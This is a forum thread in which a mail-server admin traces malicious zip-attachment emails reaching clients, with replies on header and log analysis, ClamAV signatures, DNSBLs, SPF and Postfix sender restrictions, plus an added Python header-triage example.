Hello, all of my clients are getting malicious emails sent from my server. I have never dealt with anything like this; I already contacted them and explained the situation. One of them is infected and can't use his computer anymore. It is a debian 7 perfect ispconfig server with apache from the tutorials. What are the appropriate steps? I already have a new server spun up to move everything, but I don't want it getting infected as well. I am literally panicking... Thanks.
First thing, you'll want to identify where the emails are coming from, for which you look at the (full) headers in the email messages and your mail log file. You say they are "from your server"; what exactly do you mean by that? If they are sent through an email account on your server, you may just need to change passwords on the account.

If they originate from your server but are unauthenticated, it's quite possible they come through a website. Check your web server logs to try to identify such requests; eg. see if the originating ip addr is in the email headers and search for it, or simply search for the time range the messages were sent. Once you can identify the website(s) affected, you can then find the specific script(s) which are being exploited, and start looking into what's needed to fix it, which might be as simple as updating software (eg. wordpress core/plugins/themes). There are tools to help your search here, eg. maldet and ispprotect are 2 that come to mind. If you find strange scripts which shouldn't be there sending email, probably the entire website is compromised and you should approach it as such (change passwords, clean up the site, update software, etc.).

If you simply meant your server is the mail server through which your client received an infected mail (ie. unauthenticated mail originating from the internet), you can try to improve your mail filtering/virus scanning. There's quite a bit which can be done (and it's a complex topic), though in the end it's an arms race against those sending that stuff, so it is never perfect (in some environments user education can certainly help).
Some things to try: look at adding more virus scanning signatures, and/or additional scanners; update to current software if your server is old; block obviously malicious file types/attachments, and even less obvious ones if your environment allows it; utilize blacklists/whitelists in both your mail system and firewalls; look at rescanning already delivered mail at later dates so new malware which slips through gets caught later on (if the mail isn't already downloaded...). See what you find with that and post back as you walk through it; there are quite a few helpful folks here.
Hello, thank you for your help. I suspect they were coming from sites; with ispprotect I was able to find some malicious code on different websites, which I deleted. (I didn't use those sites anymore as they were from old clients.) I checked with maldet and it didn't find anything. Once I am certain the rest is clean, I will move every site to a new server. (I had some trouble upgrading this one to jessie in the past.) Below is the source of one of the emails I had. It displays like it came from my mailbox. Maybe you see more than I do...
Code:
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from localhost (localhost [127.0.0.1])
 by server1.lswebs.net (Postfix) with ESMTP id 2E08E40A4AB
 for <[email protected]>; Thu, 24 Mar 2016 15:26:55 +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at server1.lswebs.nl
X-Amavis-Alert: BAD HEADER SECTION, MIME error: error: part did not end with expected boundary
Received: from server1.lswebs.net ([127.0.0.1])
 by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id aRWfQTluM8ct
 for <[email protected]>; Thu, 24 Mar 2016 15:26:54 +0100 (CET)
Received: from 82.186-71-150.uio.satnet.net (unknown [186.71.150.82])
 by server1.lswebs.net (Postfix) with ESMTP id CBD4A40A4A3
 for <[email protected]>; Thu, 24 Mar 2016 15:26:53 +0100 (CET)
From: <[email protected]>
To: <[email protected]>
Subject: Document2
Thread-Topic: Document2
Thread-Index: AdF+sJZYKtxaTvOhSFC+rMKD/CUwyg==
Date: Thu, 24 Mar 2016 09:26:53 -0500
Message-ID: <[email protected]>
Accept-Language: en-GB, en-US
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
x-originating-ip: [192.168.0.28]
Content-Type: multipart/mixed;
 boundary="_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_"
MIME-Version: 1.0

--_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
Content-Type: multipart/alternative;
 boundary="_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_"

--_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


--_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" xmlns:w=3D"urn:sc=
hemas-microsoft-com:office:word" xmlns:m=3D"http://schemas.microsoft.com/of=
fice/2004/12/omml" xmlns=3D"http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dus-ascii"=
>
<meta name=3D"Generator" content=3D"Microsoft Word 14 (filtered medium)">
<style><!--
/* Font Definitions */
@font-face
 {font-family:Calibri;
 panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
 {margin:0cm;
 margin-bottom:.0001pt;
 font-size:11.0pt;
 font-family:"Calibri","sans-serif";
 mso-fareast-language:EN-US;}
a:link, span.MsoHyperlink
 {mso-style-priority:99;
 color:blue;
 text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
 {mso-style-priority:99;
 color:purple;
 text-decoration:underline;}
span.EmailStyle17
 {mso-style-type:personal-compose;
 font-family:"Calibri","sans-serif";
 color:windowtext;}
.MsoChpDefault
 {mso-style-type:export-only;
 font-family:"Calibri","sans-serif";
 mso-fareast-language:EN-US;}
@page WordSection1
 {size:612.0pt 792.0pt;
 margin:72.0pt 72.0pt 72.0pt 72.0pt;}
div.WordSection1
 {page:WordSection1;}
--></style>
</head>
<body lang=3D"EN-GB" link=3D"blue" vlink=3D"purple">
<div class=3D"WordSection1">
<p class=3D"MsoNormal"><o:p> </o:p></p>
</div>
</body>
</html>

--_000_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_--

--_004_300621BC94B77642BC430B054CFFEC9C4A08FF5DBOROSBSboroloca_
Content-Type: application/zip; name="Document2.zip"
Content-Description: Document2.zip
Content-Disposition: attachment;
 filename="Document2.zip";
Content-Transfer-Encoding: base64

This is another email source I got; it uses a non-existing mailbox.
Code:
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from localhost (localhost [127.0.0.1])
 by server1.lswebs.net (Postfix) with ESMTP id B46784027BA
 for <[email protected]>; Mon, 28 Mar 2016 16:19:00 +0200 (CEST)
X-Virus-Scanned: Debian amavisd-new at server1.lswebs.nl
Received: from server1.lswebs.net ([127.0.0.1])
 by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 08uZa3twZWQ9
 for <[email protected]>; Mon, 28 Mar 2016 16:18:59 +0200 (CEST)
Received: from [180.149.210.18] (unknown [180.149.210.18])
 by server1.lswebs.net (Postfix) with ESMTP id 623A8402793
 for <[email protected]>; Mon, 28 Mar 2016 16:18:59 +0200 (CEST)
From: "netadmin" <[email protected]>
To: "[email protected]" <[email protected]>
Subject: Document (1).pdf
Date: Mon, 28 Mar 2016 19:18:58 +0500
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_0042_01D0A1F9.171F24B0"
X-Mailer: Microsoft Outlook 14.0
Thread-Index: AdCh6FNHn/LWax1JSTSc7XL2c2t2TQ==
Content-Language: en-US

This is a multipart message in MIME format.

------=_NextPart_000_0042_01D0A1F9.171F24B0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Document (1).pdf

------=_NextPart_000_0042_01D0A1F9.171F24B0
Content-Type: application/zip; name="Document (1).zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document (1).zip"

I checked the last mail in the log and this is what it says:
Code:
Mar 28 16:18:59 server1 postfix/smtpd[19539]: connect from unknown[180.149.210.18]
Mar 28 16:18:59 server1 postfix/smtpd[19539]: 623A8402793: client=unknown[180.149.210.18]
Mar 28 16:18:59 server1 postfix/cleanup[20138]: 623A8402793: message-id=<[email protected]>
Mar 28 16:18:59 server1 postfix/qmgr[5096]: 623A8402793: from=<[email protected]>, size=5204, nrcpt=1 (queue active)
Mar 28 16:18:59 server1 postfix/smtpd[19539]: disconnect from unknown[180.149.210.18]
Those both appear to be unauthenticated mail coming from the internet, not compromised websites that you host.

Do you use sanesecurity rules? (http://sanesecurity.com/) Clamav rules out of the box are quite inadequate. There are several other virus scanners for linux as well which you could look at using in combination. Some places can get away with blocking .zip files entirely, which would stop these in particular. Most places can't, but you can probably block .exe and friends if you don't already.

These 2 sending ip addrs are on quite a few blacklists at this point. They may not have been when the messages were sent, but make sure you're utilizing some rbls:
http://www.anti-abuse.org/multi-rbl-check-results/?host=186.71.150.82
http://www.anti-abuse.org/multi-rbl-check-results/?host=180.149.210.18
This catches quite a few that slip by at first, and is worth looking at.

One other suggestion is to limit who can send mail claiming to be from your domain. Look at a hard fail SPF policy for larsvansante.nl, and get familiar with the options you have in postfix sender restrictions (http://www.postfix.org/postconf.5.html#smtpd_sender_restrictions) - add reject_sender_login_mismatch and reject_unlisted_sender to help with the two samples above, but it does have implications for everyone using your server (test it with warn_if_reject first if needed).
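To make the header reading in the replies above concrete, here is an added Python example (not code from the thread) that walks the Received chain of the first sample the way a mail admin would: it trusts only the hop stamped by the server's own MX (server1.lswebs.net), uses Postfix's ESMTP versus ESMTPA/ESMTPSA keyword to tell an unauthenticated internet connection from a SASL login, flags a From: in the local domain on such a hop (the case SPF hard fail and reject_sender_login_mismatch address), and builds the reversed-octet DNSBL query name. The From:/To: addresses, the example.net local domain, the second authenticated sample and the Spamhaus zone name are assumptions, since the post scrubbed the real addresses; no DNS lookup is performed.

```python
import re
from email import message_from_string
from email.utils import parseaddr

LOCAL_MX = "server1.lswebs.net"   # host that stamped the Received lines in the samples
LOCAL_DOMAINS = {"example.net"}   # constructed: the post scrubbed the real domain

# One Received line per hop. Postfix writes "with ESMTP" for a plain SMTP client
# and "with ESMTPA"/"ESMTPSA" only when the client authenticated via SASL.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>\S+)\s+)?\[(?P<ip>[\d.]+)\]\)"
    r".*?\bby\s+(?P<by>\S+).*?\bwith\s+(?P<proto>\S+)",
    re.S,
)

def origin_hop(raw):
    """Walk Received headers newest-first and return the first hop our own MX
    stamped for a non-loopback client. Hops below it came from the sender and
    may be forged, so they are never used to decide where mail came from."""
    for value in message_from_string(raw).get_all("Received", []):
        m = RECEIVED_RE.search(value)
        if m and m["by"] == LOCAL_MX and not m["ip"].startswith("127."):
            return m.groupdict()
    return None

def dnsbl_query_name(ip, zone):
    """DNSBLs are queried as <reversed octets>.<zone>; this only builds the name."""
    return ".".join(reversed(ip.split("."))) + "." + zone

def triage(raw, zone="zen.spamhaus.org"):
    hop = origin_hop(raw)
    if hop is None:
        return {"ip": None, "authenticated": None, "spoofs_local_domain": None, "dnsbl_query": None}
    authenticated = hop["proto"].upper().endswith("A")           # ESMTPA / ESMTPSA
    sender = parseaddr(message_from_string(raw).get("From", ""))[1]
    sender_domain = sender.rpartition("@")[2].lower()
    return {
        "ip": hop["ip"],
        "authenticated": authenticated,
        # our own domain in From: on an unauthenticated hop is exactly what an
        # SPF -all record and reject_sender_login_mismatch are meant to stop
        "spoofs_local_domain": (not authenticated) and sender_domain in LOCAL_DOMAINS,
        "dnsbl_query": dnsbl_query_name(hop["ip"], zone),
    }

# Received chain copied from the first sample in the thread; From:/To: are placeholders.
SAMPLE_SPOOFED = """\
Received: from localhost (localhost [127.0.0.1])
 by server1.lswebs.net (Postfix) with ESMTP id 2E08E40A4AB
 for <victim@example.net>; Thu, 24 Mar 2016 15:26:55 +0100 (CET)
Received: from server1.lswebs.net ([127.0.0.1])
 by localhost (server1.lswebs.net [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id aRWfQTluM8ct
 for <victim@example.net>; Thu, 24 Mar 2016 15:26:54 +0100 (CET)
Received: from 82.186-71-150.uio.satnet.net (unknown [186.71.150.82])
 by server1.lswebs.net (Postfix) with ESMTP id CBD4A40A4A3
 for <victim@example.net>; Thu, 24 Mar 2016 15:26:53 +0100 (CET)
From: <victim@example.net>
To: <victim@example.net>
Subject: Document2

"""

# Constructed contrast case: a legitimate user submitting through SASL on port 587.
SAMPLE_AUTHENTICATED = """\
Received: from laptop.example.net (unknown [203.0.113.7])
 by server1.lswebs.net (Postfix) with ESMTPSA id 0000000000
 for <friend@example.org>; Mon, 28 Mar 2016 10:00:00 +0200 (CEST)
From: <victim@example.net>
To: <friend@example.org>
Subject: Hello

"""
```

Running triage(SAMPLE_SPOOFED) reports the satnet.net address as an unauthenticated hop spoofing the local domain, while the SASL sample is recognised as a genuine submission.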
Thank you so much! I added the sender restrictions you defined, which did not help. I didn't find any good tutorial for the sane check yet, but the blacklists definitely work! No spam since then. Could you tell me if this hardening guide still applies to debian jessie? https://www.howtoforge.com/hardening-postfix-for-ispconfig-3 I will go through all of it on my new server.
What is your smtpd_sender_restrictions set to?

For debian the easiest way is to install the clamav-unofficial-sigs package:
Code:
apt-get install clamav-unofficial-sigs -y
That will download a default set of sanesecurity signatures, as well as some from other sources. There are more sanesecurity signatures to consider though; see http://sanesecurity.com/usage/signatures/ for available signature databases and their FP likelihood. A quick look at the debian readme shows how to override settings for clamav-unofficial-sigs:
Code:
zless /usr/share/doc/clamav-unofficial-sigs/README.Debian.gz
As an example, to add the badmacro signatures copy the ss_dbs= section from /usr/share/clamav-unofficial-sigs/conf.d/00-clamav-unofficial-sigs.conf to a custom conf file:
Code:
sed -n '/^ss_dbs=/,$p' /usr/share/clamav-unofficial-sigs/conf.d/00-clamav-unofficial-sigs.conf | sed '/^$/,$d' > /etc/clamav-unofficial-sigs.conf.d/sanesecurity.conf
Then add badmacro.ndb to that list with your text editor or:
Code:
echo 'ss_dbs="${ss_dbs} badmacro.ndb"' >>/etc/clamav-unofficial-sigs.conf.d/sanesecurity.conf
Then wait for the next hourly cronjob, or run clamav-unofficial-sigs manually to download that:
Code:
sudo -u clamav /usr/sbin/clamav-unofficial-sigs

For the most part, yes, that would apply to jessie. Depending on your time frame, ispconfig 3.1 will have better postfix config out of the box. If https://git.ispconfig.org/ispconfig/ispconfig3/merge_requests/279 is accepted, skip the entirety of the 'Postfix main.cf' section in that hardening guide and go with ispconfig defaults. Use the ispconfig interface to configure the blacklists (DNSBL section). Postscreen is a good tool (if you can use it, eg. if you require all your clients to send on port 587), but the postscreen section there is pretty incomplete, though it would work as a first step. The SPF info and greylisting info would apply (though you might skip greylisting if you use postscreen).